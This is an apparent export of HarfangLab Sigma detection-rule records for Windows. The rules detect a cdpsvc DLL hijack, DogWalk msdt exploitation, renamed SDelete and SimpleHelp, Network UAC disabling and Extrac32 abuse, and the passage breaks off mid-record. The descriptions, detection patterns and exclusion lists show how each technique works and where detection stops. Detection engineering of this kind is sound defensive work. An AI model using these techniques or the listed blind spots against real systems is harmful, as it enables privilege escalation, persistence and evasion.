"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099191Z",
"creation_date": "2026-03-23T11:45:34.099193Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099197Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://itm4n.github.io/cdpsvc-dll-hijacking/",
"https://github.com/sailay1996/CdpSvcLPE",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cdpsvc.yml",
"content": "title: DLL Hijacking via cdpsvc service\nid: 9146b63f-6436-4d09-a566-f5662dbf44bd\ndescription: |\n Detects a potential Windows DLL search order hijacking via cdpsvc service.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n The cdpsvc service tries to load a non-existing DLL (cdpsgshims.dll) without specifying its absolute path. By putting a malicious DLL with the same name in a writable system path folder, attackers can perform privilege escalation to NT AUTHORITY\\LOCAL SERVICE .\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://itm4n.github.io/cdpsvc-dll-hijacking/\n - https://github.com/sailay1996/CdpSvcLPE\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/27\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'svchost.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\cdpsgshims.dll'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not filter_signature_imageloaded\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9146b63f-6436-4d09-a566-f5662dbf44bd",
"rule_name": "DLL Hijacking via cdpsvc service",
"rule_description": "Detects a potential Windows DLL search order hijacking via cdpsvc service.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nThe cdpsvc service tries to load a non-existing DLL (cdpsgshims.dll) without specifying its absolute path. By putting a malicious DLL with the same name in a writable system path folder, attackers can perform privilege escalation to NT AUTHORITY\\LOCAL SERVICE .\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-05-27",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "915cdabc-0cff-42c9-8234-df956175a16d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084606Z",
"creation_date": "2026-03-23T11:45:34.084608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084612Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
"https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1204_002_dogwalk_attack.yml",
"content": "title: DogWalk Attack Detected\nid: 915cdabc-0cff-42c9-8234-df956175a16d\ndescription: |\n Detects file creations by the msdt.exe process in a suspicious location which could be a sign of the exploitation of the DogWalk vulnerability.\n Microsoft Support Diagnostics Tool can trigger a bug related to a path traversal (aka DogWalk) via a crafted .diagcab file.\n For instance, once a malicious .diagcab file is opened, a new file can be saved under the Startup directory, and will be executed by the operating system at the next host startup.\n It is recommended to verify the content of the created file to determine legitimacy.\nreferences:\n - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\n - https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2024/12/05\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1218\n - attack.initial_access\n - attack.t1566\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.CVE-2022-34713\n - classification.Windows.Exploit.DogWalk\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Image|endswith: '\\msdt.exe'\n Kind:\n - 'create'\n - 'write'\n Path:\n - '?:\\Windows\\SysWOW64\\\\*'\n - '?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\Sysvol\\\\*'\n - '?:\\Users\\Public\\\\*'\n - '*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\*'\n - '*\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\*'\n - '*.lnk'\n - '*\\Documents\\PowerShell\\profile.ps1'\n - '*\\Documents\\WindowsPowerShell\\profile.ps1'\n - '*\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n - '*\\Documents\\PowerShell\\\\*_profile.ps1'\n - 
'*\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '*\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n - '?:\\Windows\\system32\\spool\\PRTPROCS\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\\\*'\n - '*\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM'\n\n filter_systemprofile:\n Path|startswith: '?:\\Windows\\System32\\config\\systemprofile\\AppData\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "915cdabc-0cff-42c9-8234-df956175a16d",
"rule_name": "DogWalk Attack Detected",
"rule_description": "Detects file creations by the msdt.exe process in a suspicious location which could be a sign of the exploitation of the DogWalk vulnerability.\nMicrosoft Support Diagnostics Tool can trigger a bug related to a path traversal (aka DogWalk) via a crafted .diagcab file.\nFor instance, once a malicious .diagcab file is opened, a new file can be saved under the Startup directory, and will be executed by the operating system at the next host startup.\nIt is recommended to verify the content of the created file to determine legitimacy.\n",
"rule_creation_date": "2024-12-05",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1218",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9171b532-aeaa-4ef7-a4d3-94ba1796194d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080211Z",
"creation_date": "2026-03-23T11:45:34.080213Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080218Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/software/S0195/"
],
"name": "t1070_004_sdelete_renamed.yml",
"content": "title: Renamed SDelete Tool Execution\nid: 9171b532-aeaa-4ef7-a4d3-94ba1796194d\ndescription: |\n Detects execution of renamed SDelete tool which is an application that securely deletes data in a way that makes it unrecoverable.\n This tool is part of the Microsoft Sysinternals suite tools and it's often used by attackers to remove files left behind by their malicious activities.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/software/S0195/\ndate: 2021/06/18\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.s0195\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.SDelete\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'sdelete.exe'\n - InternalName: 'SDelete'\n exclusion:\n - Image|endswith:\n - '\\sdelete.exe'\n - '\\sdelete64.exe'\n condition: selection and not exclusion\nlevel: medium\n# level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9171b532-aeaa-4ef7-a4d3-94ba1796194d",
"rule_name": "Renamed SDelete Tool Execution",
"rule_description": "Detects the execution of a renamed copy of SDelete, a Microsoft Sysinternals utility that securely deletes data so that it cannot be recovered.\nAttackers often use it to remove files left behind by their malicious activities, and rename it to evade name-based detection.\nThe detection relies on the binary's embedded version information (OriginalFileName / InternalName) rather than its on-disk name, so a copy with stripped or altered version metadata will not be caught by this rule.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91774714-66bb-4eb8-8298-8472ab14056b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620774Z",
"creation_date": "2026-03-23T11:45:34.620777Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620781Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction",
"https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_disable_localaccounttokenfilterpolicy.yml",
"content": "title: Network UAC Restrictions Disabled\nid: 91774714-66bb-4eb8-8298-8472ab14056b\ndescription: |\n Detects when the Network UAC is disabled by setting the LocalAccountTokenFilerPolicy registry value to 0 (Disabled).\n When set, this enables an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using a privilege local account with full administrators rights.\n This can be the prelude to an attack using the wmiexec tool.\n It is recommended to investigate if the process setting the registry value has legitimate reasons to do so.\nreferences:\n - https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/09/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy'\n Details|contains: '?WORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_bladelogic:\n ProcessImage:\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\sbin\\bldeploy.exe'\n - '?:\\Program Files\\BladeLogic\\RSC\\sbin\\bldeploy.exe'\n\n exclusion_ninjarmm:\n - ProcessGrandparentOriginalFileName: 'NinjaRMMAgent'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'NinjaOne LLC'\n - ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_minint:\n ProcessParentImage: '?:\\MININT\\Tools\\X64\\TsManager.exe'\n\n exclusion_puppet:\n ProcessParentImage: '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n\n exclusion_ccm:\n ProcessAncestors|contains: '|?:\\Windows\\CCM\\TSManager.exe|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91774714-66bb-4eb8-8298-8472ab14056b",
"rule_name": "Network UAC Restrictions Disabled",
"rule_description": "Detects when UAC remote restrictions (\"Network UAC\") are disabled by setting the LocalAccountTokenFilterPolicy registry value to a non-zero value (typically 1).\nBy default, local administrator accounts other than the built-in Administrator receive a filtered (non-elevated) token when authenticating over the network; once this value is set, they obtain a full administrator token, which lets an attacker holding local account credentials or hashes connect remotely to the machine (WMI, SCM, SMB, ...) with full administrator rights.\nThis is frequently a prelude to lateral movement with tools such as wmiexec.\nIt is recommended to investigate if the process setting the registry value has legitimate reasons to do so (e.g. Group Policy processing or an endpoint management agent).\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91acc287-552c-4012-a196-dbfa1314ba97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603866Z",
"creation_date": "2026-03-23T11:45:34.603885Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603893Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_abnormal_simplehelp_execution.yml",
"content": "title: Abnormal SimpleHelp RMM Execution\nid: 91acc287-552c-4012-a196-dbfa1314ba97\ndescription: |\n Detects the execution of SimpleHelp RMM with an unusual process name.\n SimpleHelp RMM is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2025/06/20\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.SimpleHelp\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Description: 'SimpleHelp Remote Access Client'\n\n filter_legitimate_image_name:\n ProcessName:\n - '*Remote Access*'\n - 'elev_win.exe'\n - 'session_win.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91acc287-552c-4012-a196-dbfa1314ba97",
"rule_name": "Abnormal SimpleHelp RMM Execution",
"rule_description": "Detects the execution of the SimpleHelp RMM client under an unusual process name (i.e. a renamed binary), identified by its file description.\nSimpleHelp is a legitimate Remote Monitoring and Management (RMM) tool that attackers can abuse as a Remote Access Tool (RAT) to establish an interactive command and control channel to target systems within protected networks; renaming the binary is a common way to hide its presence.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b1fef8-d05f-4b4b-8167-4c78611f980a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071137Z",
"creation_date": "2026-03-23T11:45:34.071139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071144Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/ShadowChasing1/status/1557287930267578368?t=gO0K_WXj3sYgyRls0DLS-A&s=19",
"https://lolbas-project.github.io/lolbas/Binaries/Extrac32/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_extrac32.yml",
"content": "title: Suspicious Extrac32 Execution\nid: 91b1fef8-d05f-4b4b-8167-4c78611f980a\ndescription: |\n Detects the execution of the Extrac32.exe Windows binary.\n Extrac32.exe is a legitimate Microsoft tool used for extracting files from .cab archive files.\n However, attackers may misuse it to extract malicious payloads from specially crafted cabinet files or execute arbitrary code. This technique can be used for lateral movement, data exfiltration, or persistence within a network.\n It is recommended to investigate the source of this activity, analyze the command-line arguments to identify any suspicious file paths or contents, and review any other executions in the timeline.\nreferences:\n - https://twitter.com/ShadowChasing1/status/1557287930267578368?t=gO0K_WXj3sYgyRls0DLS-A&s=19\n - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/08/23\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Extrac32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\extrac32.exe'\n - OriginalFileName: 'extrac32.exe'\n\n exclusion_hp:\n - CommandLine|startswith: '?:\\ProgramData\\HP\\'\n # C:\\Program Files\\HP\\HP ENVY 4500 series\\Bin\\HP ENVY 4500 series.exe\n # C:\\Program Files\\HP\\HP DeskJet 3630 series\\Bin\\HP DeskJet 3630 series.exe\n - GrandparentImage: '?:\\Program Files\\HP\\HP *\\Bin\\HP *.exe'\n\n exclusion_known_fp:\n # extrac32.exe /E /A /Y /L C:\\Users\\xxx\\TOSHIBA\\eSMDF\\Fax\\Resource C:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64\\3\\ESFMLNG6.CAB\n # extrac32.exe /E /A /Y /L C:\\Users\\xxx\\TOSHIBA\\eSMDF\\Fax\\Resource C:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\W32X86\\3\\ESFMLNG.CAB\n # extrac32.exe /E /A /Y /L 
C:\\Users\\xxx\\TOSHIBA\\eSMDF\\Fax\\CoverSheet C:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64\\3\\ESMFPSCS.CAB\n # C:\\Windows\\System32\\extrac32.exe /Y /E /L C:/ProgramData/HP/HP OfficeJet Pro 7740 series Help/Help/1036 C:/ProgramData/HP/HP OfficeJet Pro 7740 series Help/Help/1036/1036.cab\n\n CommandLine:\n - 'extrac32.exe /E /A /Y /L *\\TOSHIBA\\eSMDF\\Fax\\\\* ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\\\*\\3\\\\????????.CAB'\n - 'extrac32.exe /E /A /Y /L *\\TOSHIBA\\eSMDF\\Fax\\\\* ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\\\*\\3\\\\???????.CAB'\n - '?:\\Windows\\System32\\extrac32.exe /Y /E /L ?:/ProgramData/HP/HP * ?:/ProgramData/HP/HP *.cab'\n - '?:\\Windows\\System32\\extrac32.exe /Y /E /L ?:\\ProgramData\\HP\\HP * ?:\\ProgramData\\HP\\HP *.cab'\n\n exclusion_fujitsu_network_scanner:\n ParentImage: '?:\\Program Files (x86)\\FUJITSU\\Network Scanner Admin Tool V3\\AdminTool.exe'\n CommandLine: 'extrac32.exe /E /Y /L *.cab'\n\n exclusion_msiexec:\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n ParentCommandLine|contains: ' -Embedding '\n\n exclusion_epson:\n CommandLine: '?:\\WINDOWS\\system32\\extrac32.exe* ?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON_Advanced_Printer_Driver_* *?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON_Advanced_Printer_Driver_*\\\\*.cab'\n\n exclusion_olympus:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\extrac32.exe /Y /E /L ?:\\ProgramData\\Olympus\\UpdateManager\\Software\\'\n\n exclusion_lg:\n - ParentImage:\n - '?:\\Program Files (x86)\\LG Software\\LG Update\\URAlarm.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update Center\\UCAlarm.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update Center\\LGUpdateCenter.exe'\n - GrandparentImage:\n - '?:\\Program Files\\LG Software\\LG Update Center\\UCUpdate.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update Center\\UCUpdate.exe'\n - '?:\\Program Files (x86)\\LG Software\\LG Update & Recovery\\URUpdate.exe'\n\n 
exclusion_integrad:\n CommandLine:\n - 'extrac32.exe /y /l ?:\\Program Files (x86)\\Integrad.3\\MIV /e *.cab'\n - 'extrac32.exe /y /l ?:\\Program Files\\Integrad.3\\MIV /e *.cab'\n\n exclusion_visual_studio:\n CommandLine: '?:\\WINDOWS\\system32\\extrac32.exe /c /y ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\xmldso.cab ?:\\WINDOWS\\Java\\Classes\\xmldso.cab'\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\javatrig.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b1fef8-d05f-4b4b-8167-4c78611f980a",
"rule_name": "Suspicious Extrac32 Execution",
"rule_description": "Detects the execution of the Extrac32.exe Windows binary.\nExtrac32.exe is a legitimate Microsoft tool used for extracting files from .cab archive files.\nHowever, attackers may abuse it as a LOLBin to extract or copy malicious payloads from specially crafted cabinet files, staging a payload through a trusted, signed binary (proxy execution) to evade defenses.\nBecause legitimate software (printer and device driver installers, for instance) also invokes extrac32.exe, the rule carries a set of vendor-specific exclusions and may still require local tuning.\nIt is recommended to investigate the source of this activity, analyze the command-line arguments to identify any suspicious file paths or contents, and review any other executions in the timeline.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b2e839-ed45-45d4-8246-36a227383c19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078171Z",
"creation_date": "2026-03-23T11:45:34.078173Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078177Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/outflanknl/Scripts/blob/master/AMSIbypasses.vba",
"https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
